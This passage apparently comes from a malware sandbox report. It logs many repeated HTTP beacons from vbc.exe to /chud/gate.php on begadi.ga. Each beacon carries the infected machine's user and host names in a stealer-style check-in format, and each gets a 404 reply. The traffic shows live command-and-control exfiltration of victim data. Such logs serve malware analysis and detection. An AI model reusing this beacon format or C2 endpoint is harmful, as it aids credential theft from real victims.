Dec 21, 2020 08:34:43.721173048 CET	808	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:43.853421926 CET	809	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
142	192.168.2.22	49309	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:44.106561899 CET	810	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:44.167958021 CET	810	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:44.292244911 CET	810	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
143	192.168.2.22	49310	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:44.544425964 CET	811	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:44.610625029 CET	811	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:44.748707056 CET	812	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
144	192.168.2.22	49311	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:45.030307055 CET	812	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:45.098089933 CET	813	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:45.235507965 CET	813	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:44 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
145	192.168.2.22	49312	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:45.493159056 CET	814	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:45.552362919 CET	814	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:45.681647062 CET	814	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
146	192.168.2.22	49313	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:45.965225935 CET	815	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:46.023639917 CET	815	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:46.144673109 CET	816	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:45 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
147	192.168.2.22	49314	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:46.385293007 CET	816	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:46.443125963 CET	817	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:46.572973013 CET	817	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
148	192.168.2.22	49315	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:46.831907988 CET	818	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:46.894309998 CET	818	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:47.024399042 CET	818	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
149	192.168.2.22	49316	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:47.278367996 CET	819	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:47.337496996 CET	819	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:47.471688032 CET	820	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:47 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.22	49182	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:39.320761919 CET	635	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:39.382222891 CET	635	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:39.513073921 CET	636	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
150	192.168.2.22	49317	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:49.748142004 CET	821	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:49.810914040 CET	821	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:49.936609030 CET	821	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
151	192.168.2.22	49318	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:50.191618919 CET	822	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:50.252062082 CET	822	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:50.381011963 CET	823	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
152	192.168.2.22	49319	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:50.644380093 CET	823	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:50.704500914 CET	824	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:50.836067915 CET	824	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
153	192.168.2.22	49320	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:51.092144966 CET	825	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:51.151017904 CET	825	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:51.279040098 CET	825	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
154	192.168.2.22	49321	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:51.642591953 CET	826	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:51.701009035 CET	826	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:51.822869062 CET	827	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:51 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
155	192.168.2.22	49322	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:52.076004028 CET	828	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:52.138071060 CET	828	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:52.725965977 CET	828	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:52 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
156	192.168.2.22	49323	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:53.324671030 CET	829	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:53.384491920 CET	829	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:53.510987043 CET	830	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
157	192.168.2.22	49324	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:53.771213055 CET	830	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:53.834805965 CET	831	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:53.966468096 CET	831	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
158	192.168.2.22	49325	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:54.225842953 CET	832	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:54.290925980 CET	832	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:54.429843903 CET	832	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
159	192.168.2.22	49326	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:54.695089102 CET	833	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:54.757035971 CET	833	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:54.893502951 CET	834	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.22	49183	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:33:39.813663960 CET	637	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:33:39.876949072 CET	637	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:33:40.004152060 CET	637	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:33:39 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
160	192.168.2.22	49327	185.193.143.118	80	C:\Users\Public\vbc.exe

Timestamp	kBytes transferred	Direction	Data
Dec 21, 2020 08:34:55.167332888 CET	834	OUT	POST /chud/gate.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: begadi.ga Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B39EF212 Content-Length: 149 Connection: close
Dec 21, 2020 08:34:55.232393026 CET	835	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 37 00 30 00 31 00 31 00 38 00 38 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.ruAlbus701188ALBUS-PC0DE4229FCF97F5879F50F8FD3
Dec 21, 2020 08:34:55.360511065 CET	835	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 21 Dec 2020 07:34:54 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/7.3.24RC1 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

